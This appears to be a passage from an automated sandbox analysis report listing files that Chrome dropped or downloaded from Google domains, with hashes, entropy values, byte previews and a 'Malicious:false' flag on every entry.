                                                                                                                                                                                                                                                                                          SHA-256:2B4BC8BBD66F5D0985C03E48D9ED63530BD6C2D75F97F29563E28D80F592E6D9
                                                                                                                                                                                                                                                                                          SHA-512:78EFA1EF6BCCFAD2EBB4CD8F3E8A04948F48E09FC5A3AC4BA439826D38784B1960282B380328068702444CCB62E2BFC47460BDA571B171A860D7A3F3494101B4
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/2rDk7D8NJQPiKYEA6Vzy6GvuREL2IgHNQxXW-8eiSp60CAO4V1as9hWXbLfvDP7X3p3OqS1W3kr6JithHTmpNKXryf7NYJssZUXi=h120
                                                                                                                                                                                                                                                                                          Preview:......JFIF......................................................................................................................................................x.x..".........................................<.........................!...1..ABQTq...."#2Ra....r...4...................................-........................!1.."AQq..2a...3r.#............?..S..." ...""...." ...""...." ..m.Af!T.Ic...I'..s$...?.]t.6...}...)........lw.....)I.....1j.....qxC.5w....1EQ.V..|6*8.S.Iq...{..mM...8...?.,....<:.....A....u.G{..O......>H.8.............+..>...`......esP.3..h`.!..AS.A..#..yD.t......Or.G........y....D.~.8....y.n..}4.e.....{....c...\..R." ...""....B..0.. .... ..9'.d.....g.....)....5..>....e+Z).A.....U...<..N\..D.........#........#...$.6.8..W...#<'.&.[..!~.R.lF#.....B...c.v.O..(....;=..G.K.t...B`......3O*..{D.$."%K..."".....4.6......D2....s..p....k7...Bm,.cr.]AR..3k. .\dn..~....E....|x^n.......X...4...9.^~H........j..a..P.j\d..Ma.`$.i.....6..p.H.......h..o..#..moH...
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):3395
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.91868749885244
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:qwxHdaoY5B48gGFveJUar+IgT7onYfRNE4I:qW9hSO4faaT8YMV
                                                                                                                                                                                                                                                                                          MD5:1071E01BD76D0A6477B7A4D0AC55B1AB
                                                                                                                                                                                                                                                                                          SHA1:A2266251AE9886F7BA6F0DFD89A41E19A3F36B94
                                                                                                                                                                                                                                                                                          SHA-256:CA4840F284D825673814097A7C35255E3734D9F4FBFC441918ADB90EA78DD469
                                                                                                                                                                                                                                                                                          SHA-512:8B064D036781753E911769D6D182A9408BAF02166F055A2FFBF60D9620C71D8DAD4DCF1D1916675C632BA7924C11501521E9E8968ED3A5F5A36A9EC5B2294DCB
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....IDATx..yt.....K.H..a.J......E.z..w.T@.z<.^...(|..G<.K.j.U....XYDQ..kD `.KH.C...-&7K....$df.........w......|.;...FbD/.d....1.....QN...|>..8E.].>@"P...B;h.~1..L..g..u2...f.S...!@..Bv...Wu...t..-....PO.f...&S-.f.B.hI@.c..`E..a.J..D...........C...P...@.Em'R...Y]hu!..0.j.".....mC[[........Q...B.&=.......)B.H.j..;$.Z."T.X.c..'..t.U.|.....<..uV.....W.:U.jlR...[p...O...r..6.@@..Wa..gq...'.....V(B]......G$v.>.q.....U(BM.....18.q......0z."Ts....;..:-".z..1..Ce.."..3..X...o.Psd....b0....cX5.i....M.7........J...D.....S...E..{..f....lP..gE.....`0@..;.....P-oU.T:........P/.-&.t4..9.X.....)QKG5.....E..*BM.-..:..`,...~..m.Q..H....J...d.q...-..|...ME..d.....ms..".9.P...c...''.x..#v.l1v..l....E._*B.$[..b.[c$.^....P.e.1C.`...[0.Uwy}Y2f.}..?....^.[L[X.tON..j....464PSs.............8v.E.../z......8.%=...k.<.....)..m..e.^...xP.Z..7s....l}..fO......p-kV-ew.vY2..s..t..u..i....m`...8.....4.r7.wx..h._|......j........n........s.\7a..;w.%.*..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (7408)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):470274
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.617914553375893
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6144:TEm15efBVSGhiHJ4tN1kbYC5NTKee0ZWnAO+:4mUPhgJSkbr5NO0ZA6
                                                                                                                                                                                                                                                                                          MD5:AC7B1A2B3BE7AB20F714950F593F5C9B
                                                                                                                                                                                                                                                                                          SHA1:BC9EE0BB5ECDB6C9AF1A4C3632C339BC169349A6
                                                                                                                                                                                                                                                                                          SHA-256:1A447175B589C97FE31013DFF85254E96D371A9BD04CC04B0C9A742ADF727C5F
                                                                                                                                                                                                                                                                                          SHA-512:32404E4517C0D7E7502C4B229AF4943D3B5BBC29CDE8D8C4E97B1C5DDB21CAE8ABDC43114AA98C54A4037B851665B5EF2830EFBF41C7387CD18FBBC89E2EE2B3
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:"https://www.google.com/xjs/_/js/k=xjs.s.en_US.u9kBZBte-Es.es5.O/ck=xjs.s.G3hk8P0g9gc.L.B1.O/am=QAIAAAAAAAAAAAwAAAAAAAAAAAAAAAAAAAAACAAAIAAAAAAAAACRAIHLJAAAYBQAAGwAQAAAAAAAEAAAMAAAIBAAgJAQAAACgABwAQAAICAAAFAAABERAAAEjQAAAAgQAAAwAAAAAIwAYQIIoABCAC4ACRAoAhAKEQAAwAEAAIAAMMAwAEEFAAMABAAAAAAAAAAAEAARAAACKGA_gAABAHoIBICBQJgAABACAAZAAAAAAIAAAIACAAIQIALAABmAAAAAAAAAAO4DgOABgCGFBQAAAAAAAAAAAAAAAIAEwViQgIIAAAAAAAAAAAAAAAAAAAAAKUETBwg/d=0/dg=0/br=1/ujg=1/rs=ACT90oGgLl4IPCzIndZXqWhU8r9OFpIPPg/m=sb_wiz,aa,pHXghd,syzl,syzi,syzm,sy437,sonic,TxCJfd,sy7rc,qzxzOb,IsdWVc,sy7re,sy2l4,syg7,sy53a,sy1ew,sy1e8,sy1e6,sy10q,sy10o,sy10p,sy10n,sysb,sys9,sy10m,sy1hl,sy1hm,sy1e5,sy112,syuv,syuw,syu1,syde,sych,syck,syce,sycj,spch,syws,sywp,sywn,sywo,sywr,syha,sywq,sywm,sywl,sywk,syhc,syww,SMquOb,syyc,syya,syyb,rtH1bd,sy8t,syhk,syhn,syhh,syhi,syhl,syhg,syhv,syht,syhs,syhr,syho,syhf,syap,sydg,sybn,sybo,sydx,sydh,sydy,sydf,syd1,sycx,sycy,syb8,sybv,syau,sybr,syb7,syab,syaf,sya8,syac,syag,sya7,syad,sya4,sya6,sya1,sydi,syan,sybm,syaq,sybp,syal,sybk,syam,sybl,syas,syb6,sybq,sybu,syb2,sybs,syb0,syaz,syay,syaw,syb4,syar,sydj,sydb,syd3,syd7,syd4,sycm,sycn,syct,sycs,sycg,sycl,sycd,sycc,sycr,syco,syc8,syc7,syc5,syc4,syc6,sybz,sybx,syc1,syby,syc0,syak,sycp,syh3,syhe,syh8,syh9,sy8c,sy88,sy8b,syh5,syhb,syh4,syh2,sygz,sygy,sygx,sygw,sy8f,uxMpU,sygq,syds,sydq,sydr,sydk,sydz,sydm,sydl,syai,syc2,sydo,sydd,sy9c,sy9b,sy9a,Mlhmy,QGR0gd,aurFic,sy9l,fKUV3e,OTA3Ae,sy8v,OmgaI,EEDORb,PoEs9b,Pjplud,sy96,sy92,sy8z,A1yn5d,YIZmRd,uY49fb,sy85,sy83,sy84,sy82,sy81,sy80,byfTOb,lsjVmc,LEikZe,kWgXee,Ug7Xab,U0aPgd,ovKuLd,sgY6Zb,qafBPd,ebZ3mb,dowIGb,syyl,syyj,syyi,syyf,syyh,d5EhJe,sy18a,fCxEDd,sy189,sy10k,sy188,sy187,sy184,sy183,sy186,sy185,sy182,sy181,sy180,sy17z,sy17y,syyt,sywt,syx3,syyp,syys,syuf,T1HOxc,syyq,syyo,sys1,zx30Y,sy18c,sy18b,sy17v,syt1,syt0,syt2,syru,syrv,syrt,syrw,syrs,sys4,syrz,syry,syrx,syrj,syrh,sysz,sysm,sysn,syso,sysh,sys7,sysc,sys6,syro,syrp,sys2,syrk,syrl,syrf,syrn,Wo3n8,sy6ww,sy1gt,loL8vb,sy6wz,sy47g,sy3vc,ms4mZb,sy5kf,B2qlPe,sy5kh,NzU6V,sy4yy,sy1dr,zGLm3b,MpJwZc,UUJqVe,sy7x,sOXFj,sy7w,s39S4,oGtAuc,NTMZac,nAFL3,sy8r,sy8q,q0xTif,y05UD,sy1lw,sy1l5,sy1l6,sy1l7,sy1l8,sy1l4,syqd,sy43w,sy3by,sy2cz,sy1li,sy1lh,sy1lg,sy1zu,sy1ll,sy1dv,sy2cy,sy1le,sy1eg,sy1lf,sy1l0,sy1la,sy1ld,sy1ky,sy2d0,sy2aj,sy43x,sy43t,sy1mx,sy36e,sy1kx,sy2d6,sy1tl,sy2d2,sy1to,sy1l3,sy2d9,sy1re,sy27p,sy1oq,sy1or,epYOx?xjs=s3"
                                                                                                                                                                                                                                                                                          Preview:_F_installCss("c-wiz{contain:style}c-wiz>c-data{display:none}c-wiz.rETSD{contain:none}c-wiz.Ubi8Z{contain:layout style}.jbBItf{display:block;position:relative}.DU0NJ{bottom:0;left:0;position:absolute;right:0;top:0}.lP3Jof{display:inline-block;position:relative}.nNMuOd{animation:qli-container-rotate 1568.2352941176ms linear infinite}@keyframes qli-container-rotate{from{transform:rotate(0)}to{transform:rotate(1turn)}}.RoKmhb{height:100%;opacity:0;position:absolute;width:100%}.nNMuOd .VQdeab{animation:qli-fill-unfill-rotate 5332ms cubic-bezier(0.4,0,0.2,1) infinite both,qli-blue-fade-in-out 5332ms cubic-bezier(0.4,0,0.2,1) infinite both}.nNMuOd .IEqiAf{animation:qli-fill-unfill-rotate 5332ms cubic-bezier(0.4,0,0.2,1) infinite both,qli-red-fade-in-out 5332ms cubic-bezier(0.4,0,0.2,1) infinite both}.nNMuOd .smocse{animation:qli-fill-unfill-rotate 5332ms cubic-bezier(0.4,0,0.2,1) infinite both,qli-yellow-fade-in-out 5332ms cubic-bezier(0.4,0,0.2,1) infinite both}.nNMuOd .FlKbCe{animation:qli
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):6744
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.9494181708599685
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:otaZ2gKVZh1LU9eAKi+gZKKampGIw2rVw59elyxwjF88Z1OST8cDj4OQrhB:m6eZh1pAKAZZGR2rVGqyxwjF88Z1ljC
                                                                                                                                                                                                                                                                                          MD5:63F8F0D150A3C8F4FBE2D867451F3F54
                                                                                                                                                                                                                                                                                          SHA1:3E63D160790BCD99D84482F7C61A882BCB7749C1
                                                                                                                                                                                                                                                                                          SHA-256:697882381A6183F72975241C72080022C44FA396FB1315B3DF9BE6B49361C527
                                                                                                                                                                                                                                                                                          SHA-512:477E130ED8562A350FFD089582E3594320B9DFF68AE5AA0321F1AF6A11D9C2FFBBF3241A52A115F8D7B3471047AC4C588F699E71844A444E77C3EB6BC4319D60
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d...._zTXtRaw profile type APP1.....JO.K-.LV((.O..I.R..c...K.K.D......04006..F@.9T(......Y......1....H...:.C2....IDATx..][.]Wy....9s...........FX.....Q(U..@J_P..#.V.C..P.*....R.../}jEPEI!..*.T..v...x|..3..v.\.^......Z{.s......m........./.....j....j....j....j....j....j..&...f.....?G..!D.E!..4.6.y..2...`M..C...~..|....%...}t=|+.....SW.?..?:.gO..K4.....@ ..lE..\_....6/.T.G.\.@..[....._..'..#.t......'..Wz...}q......g......:.VLp.`z..h...G..@....6<+........4}....0M.}.S......=....^}.Ioe.-...m...O.^..F...G~.?..H.eB0..jL....`[.q....@...Z.6./..?.GS{&7.=g.~...G~.V....B....?9...c.....@..E..#l..A..*.N.. ..6.G.@.k7.}..|.U......\........?.6N....~......C`.@".X.B.....v%.w..2*`. ...-.{.....3.....#.W....h......s.5tn<.(. .xQ..........~".....M.?...............+...^.....O?3.._..*@>....h.."...9..d.U&B...<....;m~.?..i.....J..p...+..).w....{.....Oh..B..3.8.X.. .lE. ".....(4....b8........X..........].%.."..."z;.01.....o.O% g.Z..m".
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 512 x 293, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):197432
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.9857281551829375
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:ANSaPN7tAwi8BO9AGlMY12BiY/XV4uwSETVPIzQCEIhi3mvOHDpHFgdfOH9vL5ev:ANSE+tD9zUV4ZSmeQCO1HDd+wHqqvfbU
                                                                                                                                                                                                                                                                                          MD5:D479535F40F9F7AECB4E39AC39049108
                                                                                                                                                                                                                                                                                          SHA1:B97FC1E7115D213BE3889AC617C90DFB1FBB08A5
                                                                                                                                                                                                                                                                                          SHA-256:812AAB68108C223257DA83C7FE54B7FBEEA9C7FD78E60158FD1A2167E9BAC1E7
                                                                                                                                                                                                                                                                                          SHA-512:D810C13FC2D455F86F0D490754D6A26EDDC9B0A3E037DBFEA93C2734668ED2A34A471A83AF5C0BFA6D8363F7D163B7CB74EAE43233DE8B0E748026FD344EF3DA
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR.......%............pHYs.................IDATx...Y...&..b.....KF..VuWw.4.!_f82.?3?y.....nw-.y3c;...03U..5....U]M..y..8`0.}..j............*. . "..B@DB$C$B .D..f$"h/3..,*EsQ50PF.....C...~......!.!...iV.*..S>...i*........on...v.r...@C..xh.].. ."....I..............-# "Z=...m6......._...3.".m>Yn........-._o...<..2lE.h.^.m.`......w.].].1.1......Y....J.?K.5*h...hh.af_L>..."......'.|..x;......o...v.[i."D..G...O~oB....]...... ....l..z....v..o..6.......f...!m.C3S.e...........GD..w?\...;U...|<..?.......}..w.7....v.{d.G...g.... E.)=..~..4..{..:0.2M......w?.....t....d.Yf.....~.B.\..Ni:.Oc. ........p.?\..$.4=...|.t.._}.}{...........D....W..|..j7...#.b...O...!..&!`....H.`h..............@.H.....`.b.e..@...E.(....h.).A..@......................X/HU.......D@]..l..z...fu. .?.U.l%..^..zQ..M.X.-..CX.^V.. m.pq........]...P..... .b]..F...o_.....:.r..\\....?0..Of..$.3.......2....W.CB...@..]..."......6....K.A+.....H..v..Epq.F..a..u8.<.i.....U.yBZ
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2193
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.886006777431829
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:z3+eER2BAiiHUAIDTPaWnduy5Vxs6WrfYXO6GCPKCN:zOVniEUAInSWdbfxs6W+OWN
                                                                                                                                                                                                                                                                                          MD5:F40674C5A955432A289B6C17A0C63353
                                                                                                                                                                                                                                                                                          SHA1:6741C1B919B163F4988D0888EE9388CDD0BEDA03
                                                                                                                                                                                                                                                                                          SHA-256:B874C167A6AD43F336EB0E15DFBB60B1274C5970DB96FDFBD28D6E02CC14A177
                                                                                                                                                                                                                                                                                          SHA-512:4E664FB4D70756D335453184CB4F44EA3948BEF8DEA8B93BA40B32D976832244A9E8EF8BAF78AE9FDB5AA10DD87A1377857B110979D4569AC96C5785485CA96C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...@...@......iq....XIDATx...p.j........[fff.r.3s..!.233..b8..d...w&q..e.r..;...w....#,Iu.C....N>C.Mf.k.\[..g.n..I...Q[~..H.vX.N.......>./...#u..md/.}.X.....5.>W.!......9.=g.z......H.....G~....%y...Y..uU@3....lT...$.H_d.[m..)%.6%......g.:y..S...U........'.I...e...E...`......Q.Q....1*...9s%.....>..*..dy2{:.1..Q.`..$".7-.].m..u........#...o.....`...p..K.............:U.!..r.....,..~x&..{..lt...X.y.H.l=..>|.f....<.l.?.r..Ep...tx6z.[/.m]....C...^.~.L......sp..n......... .k+. .j..!u..U..9.[tx.._.....O.......!......QQ..~.&p......?....-Z..I..........n....n..(.!......&<..?.)......{..B.].!|..D..>..^|T........ ......f.}.g........s..bl......<g...>......Q.\.4.......+c...:.;...c..Q{.;.-.).....8}....C........A.Hx..n.T.4%+^.6$@w...0.U..|........oF.s........z...4...p?..z0.Qv^TH.B.;........U!..Yc.....^.hR.WX..........;...=[U..-_...y...k...Oc../..N....V..Vh.n..1<k..........V.@9.[.j...e....B{..0.R..c..Y...?4...e.....D..}.?.@.X...*../8....@..h.`.7{.G.c
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):660
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.7436458678149815
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:CPgCZ+X6xCDzNAs1dVc1rhVbo50xCmGjkm9vgZAO2YCGoOg/t+YcJNw:KZ+iC134tFoOxC3/vO2YCpR8YcJNw
                                                                                                                                                                                                                                                                                          MD5:C3DFF0D9F30EC0BCF4DEC9524505916B
                                                                                                                                                                                                                                                                                          SHA1:4B378403ACBEBC3747E08C69B5FD7770A850C9EB
                                                                                                                                                                                                                                                                                          SHA-256:73D788F86BE22112BB53762545989C0F1BBDB7343161130952C9BA3834FF81E3
                                                                                                                                                                                                                                                                                          SHA-512:677EA304D00D176ACF61FF68BF23BD5F77AD2928D7DE9F4B842292BC9D3FB7029FE9F578B62F142DCE689230F392E828098EED3484FE2DBEE6E1A7AA5378E2C6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:RIFF....WEBPVP8L..../'....Hv.=n.......Q...a..(Rv.o..U.....l..m........0l.6l..f.......A?B.C.A...2h..Ag0....G8.n#)R.j.x..P.F..I;.Ox......7-...bX./..]...3..T....5...x...G.C....%.u.....u/._.=....<!q.\...9.....\....p:..P.4.aS.N).>.>.."..9..Vh ....no....l.1..#6p\c..2..>..=8...........FP.^....+/.~......hs..D.Jm..9...r....t*.H..~T^|.....l..l......he..}f....d.."....K...&1..................pl.Pf.%6...2X..I...eXQ(.K..1%c..w.s._..._K`K.1}..D.E=...<..ytM..>.q'.e.L.~$...b..;k.M.....t\O..m.I._..F....'........z.]..u?~..P.zJM.. k...p~9..D....".Zl$?f..+...\.Pg..%...;.[R>N.#.W.e..@q...(....]&......K.......?.|.z..(...:&m.V.C.'...D^.R....
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):4217
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.938524730043499
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:nJcxQGmS9OitIp09ec05EOkhS6gGiMSojliNX2:Jcx4+tIGYc0YhS7GiMSoRWG
                                                                                                                                                                                                                                                                                          MD5:44B83718959F1E11C1291D2962C1DAB3
                                                                                                                                                                                                                                                                                          SHA1:5597E8F846BE88066607927E8C3FAB5E95A0C652
                                                                                                                                                                                                                                                                                          SHA-256:DC3789CC4765D5CF2BA76888A40340E4CCAF6916022F3A6DFB27DF045C6FCB5B
                                                                                                                                                                                                                                                                                          SHA-512:8CD7161755EE42104A1518F2177EB1CBAEFE3EFD607AC554AF928E7A902A5F5BB8273C75F274F63003A69CFEBE153A32886C8C73FD6EA9C3D149BD0DC268C6F8
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d...._zTXtRaw profile type APP1.....JO.K-.LV((.O..I.R..c...K.K.D......04006..F@.9T(......Y......1....H...:.C2....IDATx..{t..}.?wvV+.V...../.&<....8<".H.#..fx..J........i.Lz.3!.8!Ii^..!8)'. ........../#d.[.V.......G..>..T}..9:3s....w..w~..L1..SL1..~ .....-...x.N...q?..I%p....h...:`..!..@/....l...x...A.BV..8..Y...........u$.L...=.......z..8....&p:P.}I..,...kZ/....Xd..T3....t.....W.....T..5...]....#*....8..y&....T.$.....BA.(uG..pM{,..x......t....Gy...y..3.!.........X.-....w.c.m..x...MI...`>.B:.7....0..(...m.<.x.X.O...h.M........\{,.n...%%p...X.e<.kX.#fD.p*...X..M.C...-...[..G.xZ..!.....}..s.S..G[:..~..#....L..5gbC...k.5Y....m.t..Sl)Y..QY.....=...nTb9.|}..n.}....k.))...R[U....._n.E~...X.V....s......7.H....z#..}......Q&|...5.....|n....p-5N..:(9".]....D...k.c..^;..4......e...U..S.......2....;...]......=..=........B.D.H..../...K...!teNSCc.z..q!}...v.i..jj8.xv.vM...nn=......u.}.....H9......T..X.^9..?
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (836)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):18858
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.307097362372209
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:384:bCGXu+nlNIBRMzVKc5PsaxidME50xFP9MdYSi9tlKp:bCK7lwep7sCitKD+YDtlKp
                                                                                                                                                                                                                                                                                          MD5:28973A5C3151BE0D739C2648AA2109A0
                                                                                                                                                                                                                                                                                          SHA1:7D746E7FF84307D23507DB6D5DE40FB6E2C849D6
                                                                                                                                                                                                                                                                                          SHA-256:3B59D4F56AB2E8952CB1FE3642F54369E093291B666F71A376E004AE9BC69F96
                                                                                                                                                                                                                                                                                          SHA-512:FDE267564E707D2E49D7D618AA8D33A7390E2F0967B9A6402B053D9E81A1331E620711FF99744E35F71E72480883DD443EC95B0E192A846A1A71705B35B40749
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.gstatic.com/glue/cookienotificationbar/cookienotificationbar.min.js
                                                                                                                                                                                                                                                                                          Preview:(function(){'use strict';function p(a){var c=0;return function(){return c<a.length?{done:!1,value:a[c++]}:{done:!0}}}var q=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,c,b){if(a==Array.prototype||a==Object.prototype)return a;a[c]=b.value;return a};.function aa(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var c=0;c<a.length;++c){var b=a[c];if(b&&b.Math==Math)return b}throw Error("Cannot find global object");}var r=aa(this);function t(a,c){if(c)a:{var b=r;a=a.split(".");for(var d=0;d<a.length-1;d++){var f=a[d];if(!(f in b))break a;b=b[f]}a=a[a.length-1];d=b[a];c=c(d);c!=d&&c!=null&&q(b,a,{configurable:!0,writable:!0,value:c})}}.t("Symbol",function(a){function c(h){if(this instanceof c)throw new TypeError("Symbol is not a constructor");return new b(d+(h||"")+"_"+f++,h)}function b(h,e){this.g=h;q(this,"description",{configurable:!0,writable:!0,value:e})}if(a)re
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):106628
                                                                                                                                                                                                                                                                                          Entropy (8bit):2.310419346601203
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:O/Y1PIxVCq6vzyTalaidLkOZwSEK6P0g5o6:AWIxVr6ffdAOZ2dPVb
                                                                                                                                                                                                                                                                                          MD5:787C46F216EE2617B2A2F2F55003B125
                                                                                                                                                                                                                                                                                          SHA1:E9B42DC688870FBAAA3FE0BC7A692C623D3528AC
                                                                                                                                                                                                                                                                                          SHA-256:D9D936C7F66D7569EFA7EBC0237B8E1CE4171DEFB0E6758067BBA07C3AABA1D5
                                                                                                                                                                                                                                                                                          SHA-512:9D42B29F53F272183E3E4AFF067B66DDB4C466329308AE1D1021135ED930825C96E331A252C94BF5F7BF8157A2F0968577B3438663C7C6BF6461BF05CCEF933B
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/iRxTGREAOizQhtbCjDGShDHvBc39qEI004M8SClsSzIBgvBsbUMFNVMDfAfzoEzgvrS6Vf4B246TDqhUz3c6TipagihVSofRuGO3=s0-rw-e365
                                                                                                                                                                                                                                                                                          Preview:RIFF|...WEBPVP8Lo.../....u!...B.m.?...""9.l.*9..rlm{..J.YCf*r..c/.........].sf..w...s$.........C.....d......G./.(...Y.\...Y.0s.Gnm[...'.....C..2....+6..G.1v0.....(..vlo..<...`.C.3..eh.m.m......V.7..m......7...?...9....zO..@...m.....9....s..8..U;....n.4....T.Y.u......\k..`..k....y..y...?2..my.I... .l............HV.Hf..y...<.].e.$.........4.........-.a`|j...........Q{..../u.[..m.-.d.K !.Y.Z.[.-o.]...b{.:(. e...............m..e.,oAef...[....$YA.W.#...*....0..6M...~.....EF.E.}.(..q..tm......j...U..e..B-B.....k*"j..M<...m[..>Ah...Y..v.s......Hl8|...I.-..b..c..0....m.s......N4J..PQ.........U."h..7..h.g..F.....2.....x.m[.$I..}........l.#T.*......q$cR..W...<I.H.l[.O......Y,..0.(r..yM#[.....Z.T."...|I.dp.....G.C.../..m.mK.U.X{.s_@.Yr!Af.2..%..cf.i...B. ."..9{...m.kk..>..-^I18.A.}.:.8.`>..Q..X.U......<..Mg..[o.m...Q..[:.Yvvw..d.Sv.Df.T.(dD.V.*Dn..`.K.X.$F...J.#.k..).`..X.....j.Q.........t..1K..)..a...1K_.w).Ir.6(.Bh.\j+...................................
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (5945)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):298298
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.574166688386452
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6144:b4uypmFU7Gli04d7z3KsOemvelN+H0fxnQe:subW7G4nhDRh
                                                                                                                                                                                                                                                                                          MD5:B7FC20306A89D66A802E2A1E346CE2FF
                                                                                                                                                                                                                                                                                          SHA1:5533776DBF03858F30254F8B194A97F9F918497E
                                                                                                                                                                                                                                                                                          SHA-256:2521A4A17B5093571BC1E104CDC9EF445EFE986720D828E729F89F9A42C21651
                                                                                                                                                                                                                                                                                          SHA-512:36342CA3A135A91CABA28FF09ACC3B99B8B9BA291E9BDCE5DE3CDCA47017492B2B3971D7091EF18A8AD4C2042B303FDAF39D8851412F83828D74617BAB091F51
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.googletagmanager.com/gtag/js?id=G-3WTQFP9ECQ&l=dataLayer&cx=c
                                                                                                                                                                                                                                                                                          Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"6",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_cross_domain","priority":20,"vtp_rules":["list","^www\\.google\\.com$","^www\\.b197145817google\\.com$"],"tag_id":105},{"function":"__ogt_referral_exclusion","priority":10,"vtp_includeConditions":["list","^www\\.b197145817google\\.com$"],"tag_id":107},{"function":"__ogt_dma","priority":10,"vtp_delegationMode":"ON","vtp_dmaDefault":"DENIED","tag_id":108},{"function":"__ogt_1p_data_v2","priority":10,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled"
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
